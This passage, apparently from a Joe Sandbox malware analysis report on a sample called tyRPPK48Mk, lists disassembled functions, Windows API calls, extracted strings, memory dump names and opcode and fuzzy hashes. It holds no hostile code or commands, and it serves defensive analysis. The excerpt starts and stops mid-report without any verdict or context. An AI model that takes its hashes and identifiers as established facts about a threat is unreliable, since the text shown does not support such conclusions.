                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Close$OpenQueryValue
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Control Panel\Mouse
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1607946009-824357125
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004102B0 Relevance: 7.6, APIs: 5, Instructions: 87COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                                                                                                                                                                                                                                                                                                                                                • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcsncpy.LIBCMT ref: 004102ED
                                                                                                                                                                                                                                                                                                                                                                                                                                • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcsncpy.LIBCMT ref: 00410340
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3170942423-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0493A178 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0493A068: Sleep.KERNELBASE(000001F4), ref: 0493A079
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0493A2A9
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1786889598.0000000004937000.00000040.00000020.00020000.00000000.sdmp, Offset: 04937000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_4937000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CreateFileSleep
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: QCTMDQBDDWA12LNO5EWW
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2694422964-2706631413
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 8af22172c24b9f823577794356130d6f01fdd33e503172ee4b2c1517d50a8c95
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c11959b118bab67878e7edc4801894850563b894122ebc192a7f48d679a90578
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8af22172c24b9f823577794356130d6f01fdd33e503172ee4b2c1517d50a8c95
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F51C270D04288DBEF11DBA4C818BEEBB79AF45305F0041A9E648BB2C0D7B95B48CB65
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0040BD80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _memmove
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Error:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4104443479-232661952
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0040F520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: X$pWH
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 85490731-941433119
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 04938DC8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 04938E0D
                                                                                                                                                                                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32(00000000), ref: 04938E2C
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1786889598.0000000004937000.00000040.00000020.00020000.00000000.sdmp, Offset: 04937000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_4937000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Process$CreateExit
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: D
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 126409537-2746444292
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 03e416529f94357cb7ee45147abf4bf6199a2e9bce9b56f1b6d0fc2bb1e3bcca
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 2769e685bfcbc2cec81eb697eb66a4840ad2be297d5d481e9e6ae9856be54712
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 03e416529f94357cb7ee45147abf4bf6199a2e9bce9b56f1b6d0fc2bb1e3bcca
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7CF0127154024CABDB60EFE0CC49FEE777DBF44705F408918FB4A9A180DB74A6088B61
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00401B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                                                                                                                                                                                                • _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: @EXITCODE
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2734553683-3436989551
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00475077 Relevance: 4.9, APIs: 3, Instructions: 390COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00414ABA Relevance: 4.7, APIs: 3, Instructions: 160COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1794320848-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0040E0C0 Relevance: 4.6, APIs: 3, Instructions: 82windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0043213D Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • _malloc.LIBCMT ref: 0043214B
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                                                                                                                                                                                                                                                                                                                                • _malloc.LIBCMT ref: 0043215D
                                                                                                                                                                                                                                                                                                                                                                                                                                • _malloc.LIBCMT ref: 0043216F
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
